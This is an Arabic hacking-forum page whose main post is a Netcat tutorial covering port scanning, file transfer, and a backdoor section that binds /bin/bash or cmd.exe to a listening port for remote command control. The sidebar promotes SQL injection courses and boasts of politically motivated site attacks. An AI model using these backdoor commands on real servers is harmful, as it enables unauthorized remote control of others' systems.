1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع
  4. 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول
    الكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه
    لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده قرائة الموضوع

شرح أداة Netcat – The Swiss Army Knife

الموضوع في 'آمن المواقع والسيرفرات' بواسطة so9or, بتاريخ ‏4 أكتوبر 2011.

كاتب الموضوع : so9or المشاهدات : 2,354 الردود : 1 ‏4 أكتوبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    so9or
    rank
    Developer

    عضو منذ:
    ‏4 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ورحمة الله وبركاته
    [​IMG]
    Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
    بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
    وهي بالمرتبة الرابعة في قائمة
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها​
    فحص المنافذ المفتوحة في السيرفر
    تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
    أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
    بهذه العملية نستعمل الأمر
    nc -v -w1 SERVER-IP -z FromPort-ToPort أما بالنسبة للخيارات التي استخدمناها
    -v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
    -w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
    -z تستعمل في عملية فحص المنافذ
    مثال على ذلك
    nc -v -w1 64.233.183.147 -z 1-100 ولفحص أكثر من نطاق منافذ نستعمل الأمر
    nc -v -w1 -z 64.233.183.147 -z 1-100 400-500 ملاحظة: 64.233.183.147 هو IP موقع Google
    نقل الملفات بين جهازك والسيرفر
    من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
    وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
    nc SERVER-IP PORT < FILE ونطبق الأمر في الجهاز المستقبل
    nc -l -p PORT > FILE مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
    nc 192.168.0.45 5555 < data.txt أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
    nc -l -p 5555 > data.txt
    جعل الـ Netcat تعمل كـ Backdoor

    هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
    حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
    في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
    والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر​
    nc -l -p PORT -e PROGRAM مع اضافة -d و -L في ويندوز ليصبح الأمر
    nc -l -p PORT -d -e PROGRAM -L مثال على هذه الخاصية نقوم بتطبيق الأمر
    nc -l -p 4455 -e /bin/bash على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
    الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
    nc -l -p 4455 -e -d cmd.exe -L وللاتصال بالسيرفر نطبق الأمر
    nc -v -n SERVER-IP 4455 وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
    nc -h
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    |
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان
    أرجو أن ينال الشرح اعجابكم​
     


    جاري تحميل الصفحة...
  2. غير متصل

    Mr.Alsa3ek Guest

    عضو منذ:

    بارك الله فيك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...